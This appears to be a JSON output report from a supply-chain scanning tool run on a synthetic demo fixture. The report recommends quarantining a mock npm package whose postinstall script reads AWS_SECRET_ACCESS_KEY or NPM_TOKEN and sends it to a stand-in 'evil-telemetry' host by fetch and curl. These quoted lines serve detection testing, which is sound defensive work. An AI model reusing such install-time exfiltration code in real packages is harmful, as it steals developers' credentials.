{
  "schemaVersion": "1.0",
  "runId": "run-1790507874694-oplu0p",
  "subjectDigest": "8c25337c586380ee70dd7aa67bb9c9ead5790defaf62183485523ac9ca6dfd27",
  "generatedAt": "2026-09-27T11:35:40.987Z",
  "mode": "fixture",
  "collectionStatus": "complete",
  "overallRecommendation": "QUARANTINE",
  "keyReasons": [
    "mock-telemetry-reporter (PROCESS_EXECUTION): Executes external system processes or shell commands at line 5: \"const { execSync } = require('child_process');\"",
    "mock-telemetry-reporter (PROCESS_EXECUTION): Executes external system processes or shell commands at line 6: \"execSync(\"curl -s https://evil-telemetry.example.com/beacon\");\"",
    "mock-telemetry-reporter (LIFECYCLE_SCRIPT_ADDED): Newly introduced lifecycle script \"postinstall\": \"node setup.js\". Review installation behavior."
  ],
  "packages": [
    {
      "name": "mock-telemetry-reporter",
      "version": "1.0.0",
      "previousVersion": null,
      "location": "node_modules/mock-telemetry-reporter",
      "changeType": "added",
      "isDirect": true,
      "isDev": false,
      "isOptional": false,
      "resolved": "https://registry.npmjs.org/mock-telemetry-reporter/-/mock-telemetry-reporter-1.0.0.tgz",
      "integrity": "sha512-mockSuspiciousIntegrityString1234567890abcdefghijklmnopqrstuvwxyz==",
      "previousIntegrity": null,
      "hasInstallScript": true,
      "scripts": {
        "postinstall": "node setup.js"
      },
      "unsupported": false,
      "unsupportedReason": null,
      "provenance": {
        "publishedAt": "2026-09-01T00:00:00.000Z",
        "maintainersCount": 1,
        "repositoryUrl": "https://github.com/example/mock-repo",
        "hasAttestation": false,
        "tarballUrl": "https://registry.npmjs.org/mock-telemetry-reporter/-/mock-telemetry-reporter-1.0.0.tgz",
        "isSynthetic": true
      }
    },
    {
      "name": "picocolors",
      "version": "1.1.1",
      "previousVersion": "1.1.1",
      "location": "node_modules/picocolors",
      "changeType": "unchanged",
      "isDirect": true,
      "isDev": false,
      "isOptional": false,
      "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz",
      "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegN536lNzk469YN14WOMVL62n30R6U8FL08HT8MFHg==",
      "previousIntegrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegN536lNzk469YN14WOMVL62n30R6U8FL08HT8MFHg==",
      "hasInstallScript": false,
      "scripts": null,
      "unsupported": false,
      "unsupportedReason": null
    }
  ],
  "investigations": null,
  "observations": [
    {
      "id": "obs-mock-telemetry-reporter-script-1",
      "packageLocation": "node_modules/mock-telemetry-reporter",
      "packageName": "mock-telemetry-reporter",
      "ruleId": "LIFECYCLE_SCRIPT_ADDED",
      "severity": "medium",
      "evidenceRef": "package.json#scripts.postinstall",
      "explanation": "Newly introduced lifecycle script \"postinstall\": \"node setup.js\". Review installation behavior."
    },
    {
      "id": "obs-mock-telemetry-reporter-environment_access-2",
      "packageLocation": "node_modules/mock-telemetry-reporter",
      "packageName": "mock-telemetry-reporter",
      "ruleId": "ENVIRONMENT_ACCESS",
      "severity": "medium",
      "evidenceRef": "setup.js#L3",
      "explanation": "References environment variables which may access sensitive credentials at line 3: \"const token = process.env.AWS_SECRET_ACCESS_KEY || process.env.NPM_TOKEN;\""
    },
    {
      "id": "obs-mock-telemetry-reporter-network_operation-3",
      "packageLocation": "node_modules/mock-telemetry-reporter",
      "packageName": "mock-telemetry-reporter",
      "ruleId": "NETWORK_OPERATION",
      "severity": "medium",
      "evidenceRef": "setup.js#L4",
      "explanation": "Initiates network or socket operations at line 4: \"fetch(\"https://evil-telemetry.example.com/exfil?token=\" + encodeURIComponent(token || 'none'));\""
    },
    {
      "id": "obs-mock-telemetry-reporter-network_operation-4",
      "packageLocation": "node_modules/mock-telemetry-reporter",
      "packageName": "mock-telemetry-reporter",
      "ruleId": "NETWORK_OPERATION",
      "severity": "medium",
      "evidenceRef": "setup.js#L6",
      "explanation": "Initiates network or socket operations at line 6: \"execSync(\"curl -s https://evil-telemetry.example.com/beacon\");\""
    },
    {
      "id": "obs-mock-telemetry-reporter-process_execution-5",
      "packageLocation": "node_modules/mock-telemetry-reporter",
      "packageName": "mock-telemetry-reporter",
      "ruleId": "PROCESS_EXECUTION",
      "severity": "high",
      "evidenceRef": "setup.js#L5",
      "explanation": "Executes external system processes or shell commands at line 5: \"const { execSync } = require('child_process');\""
    },
    {
      "id": "obs-mock-telemetry-reporter-process_execution-6",
      "packageLocation": "node_modules/mock-telemetry-reporter",
      "packageName": "mock-telemetry-reporter",
      "ruleId": "PROCESS_EXECUTION",
      "severity": "high",
      "evidenceRef": "setup.js#L6",
      "explanation": "Executes external system processes or shell commands at line 6: \"execSync(\"curl -s https://evil-telemetry.example.com/beacon\");\""
    }
  ],
  "unknowns": [
    "Runtime dynamic effects were not executed or observed.",
    "Full cryptographic npm provenance was not verified (adapter extension pending)."
  ],
  "reviewStatus": "Awaiting human review",
  "reviewCommand": "node src/cli.mjs review --run \"E:\\ibm hackathon project\\supply-chain-bouncer\\reports\\demo\\suspicious-fixture\" --interactive --mode trusted-local-demo",
  "decision": null
}